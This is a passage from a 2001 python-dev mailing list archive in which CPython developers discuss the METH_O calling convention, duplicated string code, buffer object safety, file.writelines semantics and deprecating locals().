METH_VARARGS is saner than METH_OLDARGS (ie. more consistent). It seems the proposed METH_O is basically METH_OLDARGS + the restriction that there is in fact only one argument, so we save a tuple allocation over METH_VARARGS, but get argument count checking over METH_OLDARGS. Cheers, M. From tim.one at home.com Mon May 28 00:49:38 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 18:49:38 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: Message-ID: [Tim] > Next question: why isn't builtin_len using METH_OLDARGS instead? Is > there some advantage to using METH_VARARGS in this case? [Michael Hudson] > So you can't do > > >>> len(1,2) > 2 > > a la list.append, socket.connect pre 2.0? (or was it 1.6?) If I didn't know better, I'd suspect Python's internal calling conventions at the start didn't perfectly anticipate all future developements. Among other things, looks like it's impossible for a METH_OLDARGS function to distinguish between being called with more than one argument and being called with a single tuple argument. > My imprssion is that generally METH_VARARGS is saner than METH_OLDARGS > (ie. more consistent). Yes, METH_OLDARGS does appear to, well, suck. > It seems the proposed METH_O is basically METH_OLDARGS + the > restriction that there is in fact only one argument, so we save > a tuple allocation over METH_VARARGS, Also, and more importantly, save the PyArg_ParseTuple call on the receiving end. > but get argument count checking over METH_OLDARGS. Which is worth getting. I'm back to where I started here: Do METH_O, convert every "O" function to use it, declare victory, and enjoy the weekend. 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- size-ly y'rs - tim PS: But today I'll add another: add at least one comment to the code -- this stuff is a bitch to reverse-engineer. From thomas at xs4all.net Mon May 28 00:50:58 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Mon, 28 May 2001 00:50:58 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: ; from mwh@python.net on Sun, May 27, 2001 at 10:32:48PM +0100 References: Message-ID: <20010528005058.H690@xs4all.nl> On Sun, May 27, 2001 at 10:32:48PM +0100, Michael Hudson wrote: > On Sun, 27 May 2001, Tim Peters wrote: > > Next question: why isn't builtin_len using METH_OLDARGS instead? Is > > there some advantage to using METH_VARARGS in this case? > So you can't do > >>> len(1,2) > 2 > a la list.append, socket.connect pre 2.0? (or was it 1.6?) And don't forget the method-specific errormessage by passing ':len' in the format string. Of course, this can easily be (and probably should) done by passing another argument to whatever parses arguments in METH_O, rather than invoking string parsing magic every call. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From thomas at xs4all.net Mon May 28 00:58:30 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Mon, 28 May 2001 00:58:30 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: ; from tim.one@home.com on Sun, May 27, 2001 at 06:49:38PM -0400 References: Message-ID: <20010528005830.I690@xs4all.nl> On Sun, May 27, 2001 at 06:49:38PM -0400, Tim Peters wrote: > 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- > size-ly y'rs - tim And recycle a quote a day ;) > PS: But today I'll add another: add at least one comment to the code -- > this stuff is a bitch to reverse-engineer. But not just any comment, please! The Pine sourcecode is riddled with calls to 'mm_critical(stream)', and each call I've seen so far is nicely commented with the utterly useless comment '/* go critical */'. I'd-gladly-trade-in-every-mm_critical-comment-for-one-comment-to-describe- -what-Pine-actually-tries-to-do-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From martin at loewis.home.cs.tu-berlin.de Mon May 28 00:45:53 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 28 May 2001 00:45:53 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <15121.19630.329909.482775@slothrop.digicool.com> (message from Jeremy Hylton on Sun, 27 May 2001 14:51:26 -0400 (EDT)) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> <15121.19630.329909.482775@slothrop.digicool.com> Message-ID: <200105272245.f4RMjru01021@mira.informatik.hu-berlin.de> > I'd like to qualify this a bit. What I reported earlier is that the > BuiltinFuntionCall microbenchmark in pybench spends 30% of its time in > PyArg_ParseTuple(). This strikes me as excessive, because it's a > static property of the code. (One could imagine writing a Python > script that parsed the "O!|is#" format strings and generated > efficient, specialized C code for that format.) > > If we benchmark other programs, particularly those that do more work > in the builtins, the relative cost of the argument processing will be > lower. Certainly: If the work inside the function increases, the overhead of calling it will be less visible. What the benchmark shows, however, and what my patch addresses, is that the time for *calling* a function is primarily spent in PyArg_ParseTuple (and not in, say, building argument tuples, putting parameters on the stack, fetching function addresses, building method objects, and so on). Regards, Martin From tim.one at home.com Mon May 28 01:17:27 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 19:17:27 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <20010528005058.H690@xs4all.nl> Message-ID: [Thomas Wouters] > And don't forget the method-specific errormessage by passing ':len' in > the format string. Of course, this can easily be (and probably should) > done by passing another argument to whatever parses arguments in > METH_O, rather than invoking string parsing magic every call. Martin's patch automatically inserts the name of the function in the TypeError it raises when a METH_O call doesn't get exactly one argument, or gets a (one or more) keyword argument. Stick to METH_O and it's a clear win, even in this respect: there's no info in an explicit ":len" he's not already deducing, and almost all instances of "O:name" formats today are exactly the same this way: if (!PyArg_ParseTuple(args, "O:abs", &v)) if (!PyArg_ParseTuple(args, "O:callable", &v)) if (!PyArg_ParseTuple(args, "O:id", &v)) if (!PyArg_ParseTuple(args, "O:hash", &v)) if (!PyArg_ParseTuple(args, "O:hex", &v)) if (!PyArg_ParseTuple(args, "O:float", &v)) if (!PyArg_ParseTuple(args, "O:len", &v)) if (!PyArg_ParseTuple(args, "O:list", &v)) else if (!PyArg_ParseTuple(args, "O:min/max", &v)) if (!PyArg_ParseTuple(args, "O:oct", &v)) if (!PyArg_ParseTuple(args, "O:ord", &obj)) if (!PyArg_ParseTuple(args, "O:reload", &v)) if (!PyArg_ParseTuple(args, "O:repr", &v)) if (!PyArg_ParseTuple(args, "O:str", &v)) if (!PyArg_ParseTuple(args, "O:tuple", &v)) if (!PyArg_ParseTuple(args, "O:type", &v)) Those are all the ones in bltinmodule.c, and nearly all of them are called extremely frequently in *some* programs. The only oddball is min/max, but then it supports more than one call-list format and so isn't a METH_O candidate anyway. Indeed, Martin's patch gives a *better* message than we get for some mistakes today: >>> len(val=2) Yraceback (most recent call last): File "", line 1, in ? TypeError: len() takes exactly 1 argument (0 given) >>> Martin's would say TypeError: len takes no keyword arguments in this case. He should add "()" after the function name. He should also throw away the half of the patch complicating and slowing METH_O to get some theoretical speedup in other cases: make the one-arg builtins fly just as fast as humanly possible. From greg at cosc.canterbury.ac.nz Mon May 28 02:23:55 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 28 May 2001 12:23:55 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: Message-ID: <200105280023.MAA00996@s454.cosc.canterbury.ac.nz> > However, it has one fatal flaw, and no one seems > to know what to do about it. I think it would be safe if: 1) it kept a reference to the underlying object, and 2) it re-fetched the pointer and length info each time it was needed, using the underlying object's buffer interface. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Mon May 28 02:28:41 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 28 May 2001 12:28:41 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: <20010525132752.B5402@lyra.org> Message-ID: <200105280028.MAA01000@s454.cosc.canterbury.ac.nz> Greg Stein > "badly" is overstating the problem. It caches a pointer when it shouldn't. > This doesn't work well But "doesn't work well" means "can crash the interpreter". I don't think "badly" is an overstatement here... Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From tim.one at home.com Mon May 28 03:42:30 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 21:42:30 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B10D758.3741AC2F@lemburg.com> Message-ID: [MAL] > I guess there are three ways to "solve" this: > > a) mutable types don't implement the getreadbuf interface Of the few types that implement it today, that would leave only strings (8-bit and Unicode). Too much machinery just for that. Besides, I once posted an example to c.l.py showing how to use regexps to search mmap'ed files, so *that* must continue to work forever . > b) the getreadbuf interface is complemented with a callback > interface, so the the buffer object can be notified of > the change I like this best, although there's no bound on the number of buffers that may need to be notified in case of change (i.e., the object would need to maintain a list of buffers to be notified). > c) calling getreadbuf on a mutable object causes this object > to become immutable Even easier, core dump as soon as getreadbuf is called . [Greg Ewing] > I think it would be safe if: > > 1) it kept a reference to the underlying object, and That much it already does. > 2) it re-fetched the pointer and length info each time it was > needed, using the underlying object's buffer interface. If after b = buffer(some_object) b.__getitem__ needed to refetch the info between b[i] and b[i+1] I expect it would be so slow even Greg wouldn't want it anymore. From tim.one at home.com Mon May 28 03:52:18 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 21:52:18 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0FD023.C4588919@lemburg.com> Message-ID: [Tim] > About combining strop and buffers and strings, don't forget > unicodeobject.c: that's got oodles of basically duplicate code too. > /F suggested dealing with the minor differences via maintaining one > code file that gets compiled multiple times w/ appropriate #defines. [MAL] > Hmm, that only saves us a few kB in source, but certainly not > in the object files. That's not the point. Manually duplicated code blocks always get out of synch, as people fix bugs in, or enhance, one of them but don't even know about the others. /F brought this up after I pissed away a few hours trying to repair one of these in all places, and he noted that strop.replace() and string.replace() are woefully inefficient anyway. > The better idea would be making the types subclass from a generic > abstract string object -- I just don't know how this will be > possible with Guido's type patches. We'll just have to wait, > I guess. Wait for what? If it were possible, is the chance that you'd take time to rework unicodeobject.c to "subclass from a generic abstract string object" greater than 0? The chance that I would is exactly 0. From martin at loewis.home.cs.tu-berlin.de Mon May 28 08:36:49 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 28 May 2001 08:36:49 +0200 Subject: [Python-Dev] Special-casing "O" Message-ID: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> > How is METH_O different than METH_OLDARGS? METH_O will raise an exception if the function is called with more than one argument, without calling the function. METH_OLDARGS will pass a tuple in this case. I believe you cannot distinguish between a single tuple argument and an invocation with multiple arguments in a METH_OLDARGS function, is that true? Regards, Martin From martin at loewis.home.cs.tu-berlin.de Mon May 28 09:40:54 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 28 May 2001 09:40:54 +0200 Subject: [Python-Dev] file.writelines("foo\n","bar\n") Message-ID: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> When investigating calling conventions, I took a special look at METH_OLDARGS occurrences. While most of them look reasonable, file.writelines caught my attention. It has if (args == NULL || !PySequence_Check(args)) { PyErr_SetString(PyExc_TypeError, "writelines() argument must be a sequence of strings"); return NULL; } Because it is a METH_OLDARGS method, you can do f=open("/tmp/x","w") f.writelines("foo\n","bar\n") With my upcoming patches, I'd replace this with METH_O, making this call illegal. Does anybody see a problem with that change in semantics? Regards, Martin From thomas at xs4all.net Mon May 28 10:17:58 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Mon, 28 May 2001 10:17:58 +0200 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 28, 2001 at 09:40:54AM +0200 References: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: <20010528101758.K690@xs4all.nl> On Mon, May 28, 2001 at 09:40:54AM +0200, Martin v. Loewis wrote: > When investigating calling conventions, I took a special look at > METH_OLDARGS occurrences. While most of them look reasonable, > file.writelines caught my attention. It has > if (args == NULL || !PySequence_Check(args)) { > PyErr_SetString(PyExc_TypeError, > "writelines() argument must be a sequence of strings"); > return NULL; > } > Because it is a METH_OLDARGS method, you can do > f=open("/tmp/x","w") > f.writelines("foo\n","bar\n") > With my upcoming patches, I'd replace this with METH_O, making this > call illegal. Does anybody see a problem with that change in > semantics? Hell yeah. About the same problem as with the 'l.append("foo", "bar")' problem in 1.5.2 -> [1.6, 2.x]. Oddly enough, this behaviour was added in 2.0, by converting a PyList_Check into a PySequence_Check: $ python1.5 >>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n") Traceback (innermost last): File "", line 1, in ? TypeError: writelines() requires list of strings $ python2.0 >>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n") >>> I do think we'll have to allow for this for one more release, with warnings and all. It's extremely unlikely that anyone is using this, but changing it without warning will definately not benifit 2.x's image wrt. stability ;P If bugfix-releases were allowed to generate additional warnings, I'd add a warning to 2.1.1.... -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Mon May 28 11:04:51 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 28 May 2001 11:04:51 +0200 Subject: [Python-Dev] strop vs. string References: Message-ID: <3B1214B3.9A4C295D@lemburg.com> Tim Peters wrote: > > [Tim] > > About combining strop and buffers and strings, don't forget > > unicodeobject.c: that's got oodles of basically duplicate code too. > > /F suggested dealing with the minor differences via maintaining one > > code file that gets compiled multiple times w/ appropriate #defines. > > [MAL] > > Hmm, that only saves us a few kB in source, but certainly not > > in the object files. > > That's not the point. Manually duplicated code blocks always get out of > synch, as people fix bugs in, or enhance, one of them but don't even know > about the others. /F brought this up after I pissed away a few hours trying > to repair one of these in all places, and he noted that strop.replace() and > string.replace() are woefully inefficient anyway. Ok, so what we'd need is a bunch of generic low-level string operations: one set for 8-bit and one for 16-bit code. Looking at unicodeobject.c it seems that the section "Helpers" would be a good start, plus perhaps a few bits from the method implementations refactored to form a low-level string template library. Perhaps we should move this code into a file stringhelpers.h which then gets included by stringobject.c and unicodeobject.c with appropriate #defines set up for 8-bit strings and for Unicode. > > The better idea would be making the types subclass from a generic > > abstract string object -- I just don't know how this will be > > possible with Guido's type patches. We'll just have to wait, > > I guess. > > Wait for what? If it were possible, is the chance that you'd take time to > rework unicodeobject.c to "subclass from a generic abstract string object" > greater than 0? The chance that I would is exactly 0. Well, that's hard to say. It would certainly be low-priority; same for the above refactoring. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Mon May 28 11:19:16 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 28 May 2001 11:19:16 +0200 Subject: [Python-Dev] Special-casing "O" References: Message-ID: <3B121814.E5E9896A@lemburg.com> Tim Peters wrote: > > [Thomas Wouters] > > And don't forget the method-specific errormessage by passing ':len' in > > the format string. Of course, this can easily be (and probably should) > > done by passing another argument to whatever parses arguments in > > METH_O, rather than invoking string parsing magic every call. > > Martin's patch automatically inserts the name of the function in the > TypeError it raises when a METH_O call doesn't get exactly one argument, or > gets a (one or more) keyword argument. > > Stick to METH_O and it's a clear win, even in this respect: there's no info > in an explicit ":len" he's not already deducing, and almost all instances of > "O:name" formats today are exactly the same this way: > > if (!PyArg_ParseTuple(args, "O:abs", &v)) > if (!PyArg_ParseTuple(args, "O:callable", &v)) > if (!PyArg_ParseTuple(args, "O:id", &v)) > if (!PyArg_ParseTuple(args, "O:hash", &v)) > if (!PyArg_ParseTuple(args, "O:hex", &v)) > if (!PyArg_ParseTuple(args, "O:float", &v)) > if (!PyArg_ParseTuple(args, "O:len", &v)) > if (!PyArg_ParseTuple(args, "O:list", &v)) > else if (!PyArg_ParseTuple(args, "O:min/max", &v)) > if (!PyArg_ParseTuple(args, "O:oct", &v)) > if (!PyArg_ParseTuple(args, "O:ord", &obj)) > if (!PyArg_ParseTuple(args, "O:reload", &v)) > if (!PyArg_ParseTuple(args, "O:repr", &v)) > if (!PyArg_ParseTuple(args, "O:str", &v)) > if (!PyArg_ParseTuple(args, "O:tuple", &v)) > if (!PyArg_ParseTuple(args, "O:type", &v)) > > Those are all the ones in bltinmodule.c, and nearly all of them are called > extremely frequently in *some* programs. The only oddball is min/max, but > then it supports more than one call-list format and so isn't a METH_O > candidate anyway. Indeed, Martin's patch gives a *better* message than we > get for some mistakes today: > > >>> len(val=2) > Yraceback (most recent call last): > File "", line 1, in ? > TypeError: len() takes exactly 1 argument (0 given) > >>> > > Martin's would say > > TypeError: len takes no keyword arguments > > in this case. He should add "()" after the function name. He should also > throw away the half of the patch complicating and slowing METH_O to get some > theoretical speedup in other cases: make the one-arg builtins fly just as > fast as humanly possible. If we end up only optimizing the re.match("O+") case, we wouldn't need the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick and Martin could call the underlying API with one or more PyObject* taken directly from the Python VM stack. In that case, please consider at least supporting "O", "OO" and "OOO" with optional arguments treated like I suggested in an earlier posting (simply pass NULL and let the API take care of assigning a default value). This would take care of most builtins: Python/bltinmodule.c: -- if (!PyArg_ParseTuple(args, "OO:filter", &func, &seq)) -- if (!PyArg_ParseTuple(args, "OO:cmp", &a, &b)) -- if (!PyArg_ParseTuple(args, "OO:coerce", &v, &w)) -- if (!PyArg_ParseTuple(args, "OO:divmod", &v, &w)) -- if (!PyArg_ParseTuple(args, "OO|O:getattr", &v, &name, &dflt)) -- if (!PyArg_ParseTuple(args, "OO:hasattr", &v, &name)) -- if (!PyArg_ParseTuple(args, "OOO:setattr", &v, &name, &value)) -- if (!PyArg_ParseTuple(args, "OO:delattr", &v, &name)) -- if (!PyArg_ParseTuple(args, "OO|O:pow", &v, &w, &z)) -- if (!PyArg_ParseTuple(args, "OO|O:reduce", &func, &seq, &result)) -- if (!PyArg_ParseTuple(args, "OO:isinstance", &inst, &cls)) -- if (!PyArg_ParseTuple(args, "OO:issubclass", &derived, &cls)) -- if (!PyArg_ParseTuple(args, "O:abs", &v)) -- if (!PyArg_ParseTuple(args, "O|OO:apply", &func, &alist, &kwdict)) -- if (!PyArg_ParseTuple(args, "O:callable", &v)) -- if (!PyArg_ParseTuple(args, "O|O:complex", &r, &i)) -- if (!PyArg_ParseTuple(args, "O:id", &v)) -- if (!PyArg_ParseTuple(args, "O:hash", &v)) -- if (!PyArg_ParseTuple(args, "O:hex", &v)) -- if (!PyArg_ParseTuple(args, "O:float", &v)) -- if (!PyArg_ParseTuple(args, "O|O:iter", &v, &w)) -- if (!PyArg_ParseTuple(args, "O:len", &v)) -- if (!PyArg_ParseTuple(args, "O:list", &v)) -- if (!PyArg_ParseTuple(args, "O|OO:slice", &start, &stop, &step)) -- else if (!PyArg_ParseTuple(args, "O:min/max", &v)) -- if (!PyArg_ParseTuple(args, "O:oct", &v)) -- if (!PyArg_ParseTuple(args, "O:ord", &obj)) -- if (!PyArg_ParseTuple(args, "O:reload", &v)) -- if (!PyArg_ParseTuple(args, "O:repr", &v)) -- if (!PyArg_ParseTuple(args, "O:str", &v)) -- if (!PyArg_ParseTuple(args, "O:tuple", &v)) -- if (!PyArg_ParseTuple(args, "O:type", &v)) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jeremy at digicool.com Mon May 28 18:45:27 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Mon, 28 May 2001 12:45:27 -0400 (EDT) Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> References: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> Message-ID: <15122.32935.53414.174221@slothrop.digicool.com> >>>>> "MvL" == Martin v Loewis writes: >> How is METH_O different than METH_OLDARGS? MvL> METH_O will raise an exception if the function is called with MvL> more than one argument, without calling the MvL> function. METH_OLDARGS will pass a tuple in this case. Yes, I see that now. I'm +1 on METH_O, then. Jeremy From tim.one at home.com Mon May 28 19:23:47 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 13:23:47 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > I believe you cannot distinguish between a single tuple argument and > an invocation with multiple arguments in a METH_OLDARGS function, is > that true? That's the conclusion I reached after staring at the code.. From fdrake at acm.org Mon May 28 20:20:01 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Mon, 28 May 2001 14:20:01 -0400 (EDT) Subject: [Python-Dev] Removing doc/howto on python.org In-Reply-To: References: Message-ID: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com> Andrew Kuchling writes: > Looking at a bug report Fred forwarded, I realized that after > py-howto.sourceforge.net was set up, www.python.org/doc/howto was > never changed to redirect to the SF site instead. As of this > afternoon, that's now done; links on www.python.org have been updated, > and I've added the redirect. > > Question: is it worth blowing away the doc/howto/ tree now, or should > it just be left there, inaccessible, until work on www.python.org > resumes? Andrew, It looks like I never replied to this. It's probably dropped off your radar, but I'd say the answer is that the files on parrot should be discarded sooner rather than later -- when we actually manage to work on python.org we're that much more likely to have forgetten the redirection entirely! -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake at acm.org Mon May 28 20:33:13 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Mon, 28 May 2001 14:33:13 -0400 (EDT) Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <001c01c0aa95$55836f60$325821c0@newmexico> References: <200103112137.QAA13084@cj20424-a.reston1.va.home.com> <001c01c0aa95$55836f60$325821c0@newmexico> Message-ID: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Guido wrote: > Actually, I intend to deprecate locals(). For now, globals() are > fine. I also intend to deprecate vars(), at least in the form that is > equivalent to locals(). Samuele Pedroni writes: > That's fine for me. Will that deprecation be already active with 2.1, e.g > having locals() and param-less vars() raise a warning. > I imagine a (new) function that produce a snap-shot of the values in the > local,free and cell vars of a scope can do the job required for simple > debugging (the copy will not allow to modify back the values), > or another approach... Nothing has happened on this front yet. Should I add deprecation notes to the docummentation while Guido is on vacation, or wait to ask him when he gets back? Or was this matter resolved when I wasn't paying attention? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From tim.one at home.com Tue May 29 01:42:05 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 19:42:05 -0400 Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Message-ID: [Guido] > Actually, I intend to deprecate locals(). For now, globals() are > fine. I also intend to deprecate vars(), at least in the form that is > equivalent to locals(). [Fred L. Drake, Jr.] > Nothing has happened on this front yet. Should I add deprecation > notes to the docummentation while Guido is on vacation, or wait to ask > him when he gets back? Or was this matter resolved when I wasn't > paying attention? I advise continuing to ignore it. Nothing was resolved, and to judge from a trial balloon I floated on c.l.py at the time, it's not a deprecation that will be greeted with enthusiasm. The problems range from people doing def f(...): ... print "..." % locals() to people mutating locals() at module level because they simply don't understand that globals() is the same (but correct) thing to use there. Due to the first example, and as Samuele may have already suggested, we at least need to implement a mapping object capturing name bindings before we can even think about deprecating locals() for real. From tim.one at home.com Tue May 29 02:01:33 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 20:01:33 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B1214B3.9A4C295D@lemburg.com> Message-ID: [Tim] > Wait for what? If it were possible, is the chance that you'd > take time to rework unicodeobject.c to "subclass from a generic > abstract string object" greater than 0? The chance that I > would is exactly 0. [MAL] > Well, that's hard to say. It would certainly be low-priority; > same for the above refactoring. I think you must have missed this when it first came up here: /F suggested that *he* had a non-zero chance of implementing his suggestion. That makes it far closer to reality than anything that's been suggested since . From tim.one at home.com Tue May 29 02:42:54 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 20:42:54 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B121814.E5E9896A@lemburg.com> Message-ID: [MAL] > If we end up only optimizing the re.match("O+") case, we wouldn't need > the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick > and Martin could call the underlying API with one or more PyObject* > taken directly from the Python VM stack. How then does the callee know it was called with the correct # of arguments? By adding enough pointer arguments to cover the longest possible O+ string plus 1, then verifying that the one just beyond the last one it expects is NULL, while the ones before that are not? Adding another "# of arguments" member to the method table? Inventing METH_O, METH_OO, METH_OOO, ...? > In that case, please consider at least supporting "O", "OO" and "OOO" > with optional arguments treated like I suggested in an earlier > posting (simply pass NULL and let the API take care of assigning > a default value). > > This would take care of most builtins: You don't have to convince me that cases other than plain "O" exist. What's missing is data in support of the idea that calls to those are relatively frequent enough that it's a NET win to slow plain "O" in order to speed the additional cases when they happen. For example, it's not possible for calls to reduce() to have a high hit rate in real life, because builtin_reduce is a very expensive function -- there's only so many of those you can cram into a second even if the calling overhead is 0. OTOH, add a single branch to the time it takes to find builtin_type and you've slowed its *total* execution time significantly. The implementation of METH_O alone is a pure win by any measure. So would be implementing METH_OO alone, or METH_OOO alone, etc. Mix them, and they all get slower than they could have been. All the data we have says METH_O is the single most important case, and that jibes with common sense, so I believe it. If you want to speed everything, fine, do that, but that likely requires a preprocessing phase so that type signatures don't have to be resolved at runtime at all. So long as we're just looking at simple hacks, "the simpler the better" is good advice and should rule in the absence of compelling evidence against it. From tim.one at home.com Tue May 29 03:14:16 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 21:14:16 -0400 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > Because it is a METH_OLDARGS method, you can do > > f=open("/tmp/x","w") > f.writelines("foo\n","bar\n") > > With my upcoming patches, I'd replace this with METH_O, making this > call illegal. Does anybody see a problem with that change in > semantics? Guido won't, and if he had even a twinge of doubt, Thomas's explanation of how this bug was introduced in 2.0 would erase it. The list.append() docs were arguably unclear when that brouhaha hit, but there's nothing unclear about the file.writelines() docs. OTOH, the file.writelines() docs still say a list is required, not "a sequence" as the 2.0 (+ current) code actually implements. Hmm. Wonder whether writelines() should be generalized to allow an iterable object? From tim.one at home.com Tue May 29 03:49:29 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 21:49:29 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010524045938.5228199C83@waltz.rahul.net> Message-ID: [Aahz] > (This got brought up because I experimented with os._exit() as a > possible solution, but that GPFs on Win98SE.) [TIm] > Please open a bug report on that, then, with a tiny test case > if possible. > This worked fine on Win98SE for me just now: [Aahz] > Futz. *Now* it works. Now *what* works? The test case I posted, or the original test case you tried (which you didn't post)? > Chalk it up to another unreproducible bug caused by an unstable Win98. Actually doubt it -- threads are very reliable on Win98, despite that little else is (malloc() is flaky, popen() is a nightmare, etc). Here's a recent bug report on a Red Hot box that may be related: http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 I have no idea what's supposed to happen if you call os._exit from a *spawned* thread (perhaps that's what you did too? I did not) -- threads are outside the scope of the C std, so I suppose it's a x-platform crapshoot. From greg at cosc.canterbury.ac.nz Tue May 29 04:12:55 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 29 May 2001 14:12:55 +1200 (NZST) Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz> "Martin v. Loewis" > I took a special look at METH_OLDARGS occurrences. Shouldn't all these be removed? I would have thought list.append was the last one! Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Tue May 29 04:33:58 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 29 May 2001 14:33:58 +1200 (NZST) Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Message-ID: <200105290233.OAA01143@s454.cosc.canterbury.ac.nz> Samuele Pedroni writes: > I imagine a (new) function that produce a snap-shot of the values in the > local,free and cell vars of a scope can do the job required for simple > debugging I think there should be methods operating directly on stack frames for debuggers to use. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From jepler at mail.inetnebr.com Tue May 29 04:32:05 2001 From: jepler at mail.inetnebr.com (Jeff Epler) Date: Mon, 28 May 2001 21:32:05 -0500 Subject: [Python-Dev] Killing threads In-Reply-To: ; from tim.one@home.com on Mon, May 28, 2001 at 09:49:29PM -0400 References: <20010524045938.5228199C83@waltz.rahul.net> Message-ID: <20010528213205.A1236@localhost.localdomain> On Mon, May 28, 2001 at 09:49:29PM -0400, Tim Peters wrote: > Here's a recent bug report on a Red Hot box that may be related: > > http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 > > I have no idea what's supposed to happen if you call os._exit from a > *spawned* thread (perhaps that's what you 